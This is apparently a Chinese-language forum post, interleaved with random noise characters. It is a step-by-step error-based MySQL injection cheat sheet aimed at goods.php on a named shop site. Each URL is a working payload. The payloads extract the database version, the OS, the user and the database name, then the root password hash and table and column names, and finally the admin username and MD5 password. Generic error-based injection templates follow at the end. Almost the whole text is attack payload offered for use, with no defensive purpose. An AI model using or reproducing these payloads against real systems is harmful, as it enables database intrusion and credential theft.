判断版本号
+ Z! B: i' p/ r3 Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ y a" ]6 g, I+ Y
7 f) l6 F, Y1 B6 s+ _6 {
判断系统5 Q6 e/ G7 P' ~* {+ d
# G) D# E" T* \
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 {9 ]9 z6 F; o, N$ J7 `
; ?1 {$ S* P! U7 i
+ w4 v3 j% @# ~- V( }6 G8 @9 W. i' @$ d6 ~ C0 M
当前 user()
3 p {/ L' p/ y& b# L. `! x7 D( b' w% T& B0 ? v* Q6 S
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 |" I f2 E" R6 Y& z5 p) Z3 _
" X# [8 K7 s8 ^: k
) z2 F: ?+ d9 M: l. [, \
+ S6 N6 j. U' ], l1 E当前 database()1 v% o, X' \& h( Z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 D3 u8 {( Q y8 Z; H4 E( z k2 @" I) ?$ y. R) ?/ }1 U1 D, a' C
\- W! t" T5 z5 m/ i* V
3 R9 _7 F2 F2 [) ^' m
! {: w$ A1 K0 K+ p7 i8 l0 [9 p" p2 ?root hash
5 b) H. E+ C. h5 E. c# e6 |2 b( e) p% |4 p" P8 Z* F
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" U/ z c! Q X0 l1 g1 j, y3 h( a C6 n! A$ }% U
6 D9 h$ k9 V% c w& ` T; A# j( Q# j. F' N1 h, y
当前 数据库表名
. w+ D2 I. u& L( y$ Y# L/ G5 X
7 E9 f. x5 O" |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 K9 G! \; I' Y6 r9 s- O7 r
$ K* r$ [% ?9 @/ t" I2 c1 ^$ K
1 A9 P. k0 ]5 u1 K# M: d% S" h- ^
$ j" n I+ L1 `1 P W" v当前 数据库 user_name 字段
" f' g9 b9 G0 P& H! ^7 J; B+ `( J: i3 A: S
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, Z& g6 D) b& X0 W% d$ ^
& x, Q! x" E( R9 A当前 数据库 字段 password
5 e1 V' X8 Z! e4 h {* bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 _; e. q" a% L6 D$ P" `% Q1 x* ^8 m$ L7 z$ O% z& V; [) g- K$ Z% F! i
7 o- }6 R/ i- }3 I4 C5 m. h. @1 Z: z: ?& i" l8 W8 y
获得 admin passwd(md5)2 M1 i! C) V0 }2 R. w
9 m, a6 l/ x& R# \% N+ @
' H/ Y4 C3 ]9 P8 B/ ]& Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 v9 g5 R7 B6 v
: B+ c7 l" B) A) }, X报错注射% r. P$ k) }. ?& E' x! ?
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. ?, f0 Y# L j. g. J' B% ?; S: {% _, b1 d7 _+ ?
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. a( Y. P% h% x" |$ x
2 z, f; K. m" y/ ^and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |